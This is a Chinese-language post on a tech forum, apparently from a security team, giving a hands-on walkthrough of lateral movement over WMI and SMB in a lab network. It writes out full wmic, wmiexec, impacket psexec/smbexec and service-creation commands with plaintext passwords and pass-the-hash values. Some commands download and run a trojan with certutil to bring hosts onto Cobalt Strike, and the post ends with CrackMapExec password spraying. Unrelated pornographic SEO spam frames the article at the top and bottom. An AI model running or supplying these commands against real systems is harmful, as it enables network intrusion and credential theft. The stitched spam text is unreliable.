在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

什么是WMI?WMI利用手法介紹

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2023-02-12 09:40 ? 次閱讀

WMI

什么是WMI?

WMI是通過135端口進行利用,支持用戶名明文或hash的方式進行認證,在使用WMIC執行命令過程中,操作系統默認不會將WMIC的操作記錄在日志中,因此在利用過程中不會產生日志。所以越來越多的攻擊者開始漸漸使用WMI進行攻擊。

WMI的利用條件

1.獲得目標機器的用戶名和密碼

2.開放139、445端口

WMIC的使用需要對方開啟135端口(有的工具需要445端口)和admin$共享,135端口是WMI默認的管理端口

WMI利用手法

WMI演示環境如下圖:

f16595d2-a9e3-11ed-bfe3-dac502259ad0.png

WMIC

系統自帶的WMIC命令是單執行,無回顯的,并且只支持明文密碼,不支持hash進行傳遞 在這里,我們對SQLserver執行了一個ipconfig的命令,并將結果保存在C盤的ip.txt文件中:

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cipconfig>c:ip.txt

f175f300-a9e3-11ed-bfe3-dac502259ad0.png

可以看到我們并無法直接看到命令的回顯,但我們上帝視角切到靶機發現確實是執行命令了的 。

f19752ca-a9e3-11ed-bfe3-dac502259ad0.png

這里如果在實戰中,如果想要查看文件內容和文件是否上傳成功的話,就要使用上篇文章內網移動-IPC中的type和dir命令

dir\192.168.3.32c$#列出該主機的C盤下的文件 type\192.168.3.32c$ip.txt

f1b501bc-a9e3-11ed-bfe3-dac502259ad0.pngf1d68b16-a9e3-11ed-bfe3-dac502259ad0.png

這里將其上線CS的步驟也是:使用下載命令讓其下載Web Server中的木馬,執行上線

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/ccertutil-urlcache-split-f "#下載Webserver中的木馬文件到自己的C盤

f1fa3106-a9e3-11ed-bfe3-dac502259ad0.png

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cc:/4444.exe"#執行木馬

f21184b4-a9e3-11ed-bfe3-dac502259ad0.png

可以看到此時sqlserver成功被上線。

f22bb9ba-a9e3-11ed-bfe3-dac502259ad0.png

wmiexec.vbs

wmiexec.vbs 腳本通過 VBS 調用 WMI 來模擬 PsExec 的功能,wmiexec.vbs 下載地址:https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs,交互式,適合在反彈shell或msfconsole中使用,不適合CS控制 首先我們將其上傳到跳板機中,然后再使用命令去連接,由于CS無法返回shell的問題,所以該腳本并不適用于在CS中運行,所以這里我選擇將會話轉移到MSF中去運行。

f237bb20-a9e3-11ed-bfe3-dac502259ad0.png

cscript//nologowmiexec.vbs/shell192.168.3.32administratoradmin!@#45

f24171f6-a9e3-11ed-bfe3-dac502259ad0.png

可以看到在MSF中運行了該文件后,成功將sqlserver的shell反彈了過來,在此我們可以直接讓其下載后門并執行,上線到我們的CS中。

cmd.exe/ccertutil-urlcache-split-f

f2556742-a9e3-11ed-bfe3-dac502259ad0.png

可以看到SQLserver成功上線CS

wmiexec-impacket

impacket套件中的wmiexec同樣可對WMI進行橫向移動,并且支持交互式與單執行,支持hash進行傳遞,相對來說更為方便,這里直接使用它的py腳本配合socket代理就可以對其內網進行橫向移動,避免了上傳文件等敏感操作。首先設置好Socket代理,與proxifier的代理與代理規則

f268a65e-a9e3-11ed-bfe3-dac502259ad0.pngf278f23e-a9e3-11ed-bfe3-dac502259ad0.pngf29125b6-a9e3-11ed-bfe3-dac502259ad0.png

配置好socket代理與規則后,就可直接在本機中調用wmiexec.py文件對其內網進行wmi利用

pythonwmiexec.py./administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標本地用戶交互式shell pythonwmiexec.pygod/administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標域用戶交互式shell

f2a8c842-a9e3-11ed-bfe3-dac502259ad0.pngf2cf77f8-a9e3-11ed-bfe3-dac502259ad0.png

通過該命令成功獲得一個交互式的shell,那么wmiexec.py也可單執行命令。

pythonwmiexec.py./administrator:admin!@#45@192.168.3.32"whoami"#以明文密碼連接本地用戶并執行命令

f2f5c886-a9e3-11ed-bfe3-dac502259ad0.png

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"#以hash密碼連接本地用戶并執行命令

f3075c72-a9e3-11ed-bfe3-dac502259ad0.png

這里將目標上線CS的方式和上面一致,通過命令下載木馬并執行。

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"cmd.exe/ccertutil-urlcache-split-f "

f315ca32-a9e3-11ed-bfe3-dac502259ad0.png

SMB

什么是SMB?

SMB(Server Message Block)服務器信息塊,它也是一種客戶端到服務器的通信協議。除此之外,SMB協議也被稱為請求-回復協議。客戶端與服務器建立連接后,客戶端可以向服務器發送SMB命令允許用戶訪問共享、打開、讀取或者是寫入文件

SMB的利用條件

1. 利用SMB服務可以通過明文或hash傳遞來遠程執行,條件445服務端口開放。

2.獲得該目標的賬號名與密碼或hash

SMB利用手法

SMB演示環境如下圖:

f33c48f6-a9e3-11ed-bfe3-dac502259ad0.png

PsExec

官方Psexec

Psexec 是由 Mark Russinovich 創建的 Sysinternals Suite中包含的工具。最初,它旨在作為系統管理員的便利工具,以便他們可以通過在遠程主機上運行命令來執行維護任務。后來因為太過方便,被利用到內網滲透之中,但不支持hash傳遞,且CS無法利用,而且該工具好像只能在具有桌面權限后才可進行利用,我這里使用msf和反彈shell都無法成功反彈shell.... 這里將psexec.64上傳到跳板機中

f34e367e-a9e3-11ed-bfe3-dac502259ad0.png

然后在跳板機桌面中運行該工具,就會反彈出目標機器的shell,如下圖所示

psexec64.exe\192.168.3.32-uadministrator-padmin!@#45-scmd

f3615e02-a9e3-11ed-bfe3-dac502259ad0.png

Impacket-PsExec

還有一個psexec就是我們的impacket套件中的工具,官方psexec有諸多限制,如不支持hash、cs、msf無法利用成功等問題,所以這里選擇使用impacket中的psexec工具就相對來說比較靈活,同樣,為了避免發送上傳文件時數據丟失或被查殺等問題,我們可使用socket+psexec.py對其內網進行橫向移動。socket配置此處不再描述,這里直接使用impacket-Psexec.py進行利用

psexec.py./administrator:admin!@#45@192.168.3.32#通過明文密碼連接獲得目標本地用戶交互式shell psexec.pygod/administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標域用戶交互式shell

f39025de-a9e3-11ed-bfe3-dac502259ad0.pngf3ab14e8-a9e3-11ed-bfe3-dac502259ad0.png

pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32#通過哈希密碼連接獲得目標本地用戶交互式shell pythonpsexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通過哈希密碼連接獲得目標域用戶交互式shell

f3c0ae02-a9e3-11ed-bfe3-dac502259ad0.pngf3e05d10-a9e3-11ed-bfe3-dac502259ad0.png

CS插件-psexec

在我們的CS中其實也有PSEXEC利用功能,且利用較為方便與簡單,在targets中選中目標右鍵即可彈出利用選項,且支持hash的移動

f40a39c8-a9e3-11ed-bfe3-dac502259ad0.png

點擊psexec64后,就會讓我們選擇用戶名密碼與所登錄域等,這里我們直接選擇之前我們在跳板機中所收集的密碼,Domain置空的話為本地用戶登錄,輸入域名后則為域用戶登錄,選擇監聽器和會話之后,點擊Launch即可。

f41c0f7c-a9e3-11ed-bfe3-dac502259ad0.pngf42e0182-a9e3-11ed-bfe3-dac502259ad0.png

這里看到Sqlserver成功上線,這里如果想以域用戶的身份登錄時,Domain處輸入域名即為域用戶身份登錄。

f447c252-a9e3-11ed-bfe3-dac502259ad0.png

較為簡單,這里不做過多講解。

smbexec-impacket

在impacket中smbexec工具也可以進行移動,該工具利用方式和psexec利用方式相同,這里簡單介紹一下即可

pythonsmbexec.py./administrator:admin!@#45@192.168.3.32#通過明文密碼連接獲得目標本地用戶交互式shell pythonsmbexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通過哈希密碼連接獲得目標域用戶交互式shell

f46bf244-a9e3-11ed-bfe3-dac502259ad0.pngf496adf4-a9e3-11ed-bfe3-dac502259ad0.png

Services

同時還有一個系統自帶的服務也可進行利用,該服務支持哈希密碼傳遞,且為單執行無回顯,無法交互shell。具體利用過程如下:首先建立SMB連接后,創建一個服務,服務綁定木馬,然后在啟動該服務,即可上線到CS中

services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32create-nameshell-displayshellexec-pathC:4444.exe#建立SMB連接并創建服務綁定木馬 services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32start-nameshell#啟動shell服務

CrackMapExec

在內網滲透中,能獲取到主機管理員賬號密碼,將會使我們橫向事半功倍,尤其是在大內網環境中,密碼復用率很高,一波噴灑,能助力你拿到一波主機,對拿到的主機再次抓取密碼,再用新拿到的密碼噴灑一波......,如此反復。密碼噴灑的思路就是這樣:不斷收集內網賬號密碼,不斷去噴灑。這時我們就需要類似CrackMapExec這樣的密碼噴灑工具,對其內網進行密碼噴灑。CrackMap同樣的,CrackMapExec支持本地、域內和明文密文的fuzz,具體利用命令如下:域用戶明文密碼噴灑:

proxychainscrackmapexecsmb192.168.3.21-32-udbadmin-p'Admin12345'

f4b08f80-a9e3-11ed-bfe3-dac502259ad0.png

本地用戶明文密碼噴灑:

proxychainscrackmapexecsmb192.168.3.21-32-uadministrator-p'admin!@#45'--local-auth

f4d61cfa-a9e3-11ed-bfe3-dac502259ad0.png

域內用戶hash密碼噴灑

proxychainscrackmapexecsmb192.168.3.32-udbadmin-H'518b98ad4178a53695dc997aa02d455c'

f527e6de-a9e3-11ed-bfe3-dac502259ad0.png

本地用戶hash密碼噴灑

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth

f54cbb08-a9e3-11ed-bfe3-dac502259ad0.png

執行命令也是非常的簡單,這里直接在上面命令后加上-x 'bash' 即可

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth-x'whoami'

f5746072-a9e3-11ed-bfe3-dac502259ad0.png

當然這里也可以通過已經噴灑出的主機和密碼配合CS中的psexec上線到CS中。此處就不再演示。







審核編輯:劉清

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • SQL
    SQL
    +關注

    關注

    1

    文章

    768

    瀏覽量

    44177
  • SMB
    SMB
    +關注

    關注

    0

    文章

    40

    瀏覽量

    11776
  • WMI
    WMI
    +關注

    關注

    0

    文章

    2

    瀏覽量

    6089
  • Hash算法
    +關注

    關注

    0

    文章

    43

    瀏覽量

    7404

原文標題:橫向移動-WMI、SMB

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    IE工具--IE七大手法

    IE工具--IE七大手法
    發表于 05-06 19:36

    在passthrough中使用GPU進行測試

    我在xenserver 6.2 SP1上的傳遞模式中有K2,我正在嘗試確定我的應用程序如何強調GPU。我添加了nvidia WMI包,但是對于我關心的所有GPU值,例如內存和%GPU,windows
    發表于 10-10 16:17

    變頻電源的操作手法

    在你購買任何一樣電器產品的時候,銷售員都會告訴你使用方法是怎樣的,應該注意些什么。因為每個產品都會用專用的操作手法,這樣就會在避免操作錯誤或者不當而造成損害。變頻電源也是一樣,也有正確的操作手法
    發表于 12-30 07:09

    怎么修改筆記本蓋上的電源設置

    一個網友問怎么修改筆記本蓋上的電源設置,比較直接的方式可以直接通過wmi修改。比如說$Name=@{Namespace='root\cimv2\power'}$ID
    發表于 03-02 06:34

    mcuxpresso Windows 10 21H1和Windows 11無法運行程序wmic createprocess error=2怎么解決?

    頻道版本中已棄用。此工具已被適用于 WMI 的 Windows PowerShell 取代。注意:此棄用僅適用到命令行管理工具。WMI 本身不受影響。”臨時解決方法:幸運的是我還有一個
    發表于 04-04 08:40

    基于WMI的實時監控系統設計與實現

    本文設計了一個基于WMI的系統性能實時監控系統,使用JFreeChart設計用戶界面,從而實現系統性能的實時監控,并對系統實現過程中涉及到的關鍵技術進行了研究分析。關鍵詞: WMI
    發表于 06-20 08:42 ?27次下載

    BS架構下基于WMI實現映射網絡驅動器

    利用網絡映射驅動器將學生平時上機練習的文件和計算機網絡化考試時學生的考試文件直接保存在服務器上,可以有效的管理學生的文件,防止文件丟失。針對傳統映射方法工作
    發表于 12-25 16:42 ?18次下載

    常用QC手法應用實務

    常用QC手法應用實務 本課程以實際應用為導向,說明并整合QC7手法與新QC7手法(管理7手法)以講師資深實務經驗,依企業實際狀況,組合改善活動常用工具、方法,參加學員除
    發表于 02-01 14:02 ?59次下載

    windowsxp常用命令

    windowsxp常用命令   winver---------檢查windows版本 wmimgmt.msc----打開windows管理體系結構(wmi) wupdmgr-------
    發表于 01-10 09:05 ?1286次閱讀

    WINDOWS開始運行中可以起動的程序命令展覽

    WINDOWS開始運行中可以起動的程序命令展覽 winver---------檢查Windows版本 wmimgmt.msc----打開windows管理體系結構(WMI) wupdmgr--------windows更
    發表于 01-14 10:58 ?757次閱讀

    氬弧焊焊接手法與技巧

    本文主要闡述了氬弧焊焊接手法與技巧。
    發表于 08-26 13:57 ?2.9w次閱讀

    建筑照明系統設計的表現手法介紹

    古建筑是城市景觀的重要組成部分,反映了一座城市的文化底蘊和歷史氣息。那么,中國古建筑照明設計有哪些燈光表現手法
    的頭像 發表于 12-24 12:24 ?556次閱讀

    常見服務弱口令爆破工具:crack

    支持常見服務口令爆破(未授權檢測):ftp、ssh、wmi、wmihash 、smb、mssql、oracle、mysql、rdp。
    的頭像 發表于 10-31 11:30 ?2402次閱讀

    什么是PTH?PTH利用手法介紹

    pass the hash:哈希傳遞攻擊,簡稱PTH,是在內網滲透中一種很經典的攻擊方式
    的頭像 發表于 05-16 09:44 ?3419次閱讀
    什么是PTH?PTH<b class='flag-5'>利用手法</b><b class='flag-5'>介紹</b>

    新QC七大手法(工具)完整版介紹

    導語“七大手法”主要是指企業質量管理中常用的質量管理工具,昨天給大家介紹的老七種手法。“老七種”有分層法、調查表、排列法、因果圖、直方圖、控制圖和相關圖,新的QC七種工具分別是系統圖、關聯圖、親和圖
    的頭像 發表于 04-09 09:42 ?3679次閱讀
    新QC七大<b class='flag-5'>手法</b>(工具)完整版<b class='flag-5'>介紹</b>
    主站蜘蛛池模板: 国产色播| 一区二区三区高清不卡| 永久免费精品影视网站| 在线视频精品免费| 天天弄天天干| wwwwww日本| 999伊人| 国产精品视频第一区二区三区| 国产乱辈通伦影片在线播放亚洲| 都市激情综合| 久久国产精品久久久久久久久久| 精品综合久久久久久98| 国产伦子一区二区三区四区 | 在线观看视频免费入口| 欧美乱乱| 西西人体大胆高清啪啪欧洲| eeuss影院www影院夜场| 男人日女人视频在线观看| 91大神精品| 99热精品久久只有精品30| 天天精品视频在线观看资源| 日本理论片www视频| 日本黄免费| 国产一级特黄特色aa毛片| 亚洲精品久久久久久久蜜桃| 国产巨大bbbb天美| 一区二区高清在线观看| 亚洲你xx我xx网站| 欧美午夜场| 免费一级大片| 成人a毛片免费全部播放| ts 人妖 另类 在线| 日韩夜夜操| 在线成人免费观看国产精品| 亚洲三级视频在线观看| 你懂的在线视频观看| 18毛片| 最刺激黄a大片免费网站| 在线播放黄色| 久久青草精品一区二区三区| 国产女人在线视频|